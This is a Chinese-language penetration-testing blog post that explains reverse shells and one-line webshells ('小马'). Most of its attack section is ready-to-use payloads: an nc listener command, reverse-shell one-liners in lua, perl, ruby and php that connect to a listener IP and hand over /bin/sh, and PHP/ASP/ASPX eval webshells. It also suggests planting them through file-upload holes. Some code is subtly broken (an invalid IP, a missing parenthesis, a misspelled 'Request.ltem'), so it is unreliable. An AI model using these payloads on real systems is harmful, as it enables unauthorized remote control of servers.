渗透测试小马(一句话)篇
渗透测试首先要搞定虚拟机和环境问题,虚拟机就不在赘述,网上很多,我也写过,此处以反弹shell为例。
一、什么是反弹shell?
反弹shell (reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。
reverse shell 与telnet, ssh 等标准 shell 对应,本质上是网络概念的客户端与服务端的角色反转。
二、为什么要反弹shell?
为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet 等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况:
有如下情况:
- 某客户机中了你的网马,但是它在局域网内,你直接连接不了。
- 目标机器的ip动态改变,你不能持续控制。
- 由于防火墙等限制,对方机器只能发送请求,不能接收请求。
- 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
- 那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
环境的查看方法是win+R,呼出指令面板,输入cmd,打开命令提示符。
输入各种环境查询,如果没有,就像这样。
如果有,就像这样
然后就可以执行各种测试
具体的实验建议分别在一台kali Linux 和一台 C/Linux上做,最好用远程监听工具
我推荐这款 无网络,不实验哦
在kali Linux上监听端口命令:nc -lvvp 1111
(端口自己随便改,有不冲突就行)
就像这样
然后在C/Linux上输入各种代码
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.227.129','1111');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:
反馈:
perl -e '
use Socket;
$i="192.168.227.129";
$p=1111;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.227.129","1111");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
php -r '$sock=fsockopen("192.168.277.129",1111);exec("/bin/bash -i <&3 >&3 2>&3");'
诸如此类,反馈也不尽相同
链接成功,这就是初步的渗透测试。
小马通常指一句话木马,因为其代码量比较小,就是一句简单的代码。以下是几种
脚本类型的一句话木马:
PHP:
<?php @eval($_REQUEST['cmd'];?>
ASP:
<% eval request{"cmd"}%>
ASPX:
<%@ Page Language="jscript"%>
<%eval{Request.ltem["cmd"],"unsafe"};%>
JSP和JSPX的一句话木马比较复杂懒得写了o(* ̄︶ ̄*)o
可利用文件上传漏洞执行一句话木马进而查看IP,下载。。。等操作
渗透测试小马(一句话)篇相关推荐
- 网络安全-渗透测试-Kali Linux教程篇 篇(六) 漏洞分析-02——AppScan-轻量级Web漏洞扫描、安全审计工具
本文目录 关于本篇 声明 正文 AppScan 安装教程 使用教程 Web Application Scan 关于本篇 本篇是网络安全-渗透测试-Kali Linux教程篇 第六篇 漏洞分析部分的第二 ...
- 网站渗透测试,看这篇就够了
一.信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等. 2.查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞. 3.查看服务器操作系统版 ...
- 渗透测试培训--(小迪篇)
希望我的回答能对你有所帮助,同时说明一下,别人的回答只能参考,实际还是需要自己亲自去感受,最好找找相关培训机构的试听课程试听一下或者联系一下那些真报名的朋友咨询一下情况. 下面我会从我自己感觉的优缺点 ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
文章目录 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC mshta.exe利用 msf利用模块 方法一(msfconsole) 方法二(msfvenom) Cobal ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
- Kali Linux渗透测试小实践——Metasploit与后门木马
一.环境和工具准备 1.Metasploit Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的 ...
- 53.网络安全渗透测试—[文件上传篇3]—[扩展名黑白名单穷举-突破上传]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.黑白名单的穷举 1.解题过程: 2.扩展名字典 一.黑白名单的穷举 1.解题过程: 第一步:发现文件上传动作 ...
- ios APP 安全渗透测试(共46篇)
翻译自一位外国大牛的系列文章,共46篇,整理不易,内容详实,只提供给需要的人看.懂,请下载. 文件:n459.com/file/25127180-479629106 访问密码:551685 以下内容无 ...
- Kali Linux渗透测试小实践——DNS欺骗
目录 一.DNS欺骗 1.介绍 2.原理 二.环境和工具 1.kali Linux和靶机(这里选择windows 7) 2.ettercap 三.攻击过程 1.首先确认一下Kali和靶机的IP地址以及 ...
最新文章
- 白天鹅黑天鹅灰天鹅?手把手教你用卷积神经网络搞定识别
- 2019年《自然》迎新子刊:机器智能、新陈代谢和综述物理
- 【 FPGA/IC 】addsub 的实现
- 解决冲突的拉链法探测的ASL
- C#电视节目单展示案例
- 系统重构的10点经验总结
- 替代微软SMS的好工具——Lansweeper
- Context结构图
- 使用peewee增删查改数据库
- 并查集的补集 (关押罪犯)
- Web 2.0 编程思想:16条法则(转)
- DOM增删操作(创建删除表格)
- 【CDN学习笔记5】源站IP变更后导致图片显示不出来的案例
- Unity禁止多点触控
- 基于遗传算法的神经网络,遗传算法训练神经网络
- matinee和matin区别_【近义词辨析】An和Année, Jour和Journée如何区别
- Android项目实战之高仿网易云音乐项目介绍
- 电脑保护眼睛的背景颜色
- php ini_get,ini_get - [ php中文手册 ] - 在线原生手册 - php中文网
- spark ML算法之线性回归使用
热门文章
- 数学建模债券投资组合_1998年全国大学生数学建模竞赛题目A题投资的收益和风险.PDF...
- python数据接口设计_Python接口与归一化设计
- python的raw函数_Python内建函数之raw_input()与input()代码解析
- 为什么要娶就娶电力女?!
- 酷!GitHub开发者自研火星车,开发教程全面开源
- verilog设计万年历带实验报告
- HTML5如何添加图片遮罩,带有HTML5画布的putImageData的遮罩?
- python从视频中提取音频_提取视频中的音频——python三行程序搞定!
- NIOS生成Nios libaray
- /usr/bin/ld: skipping incompatible /usr/lib/mysql/libmysqlclient.so when searching for -lmysqlclient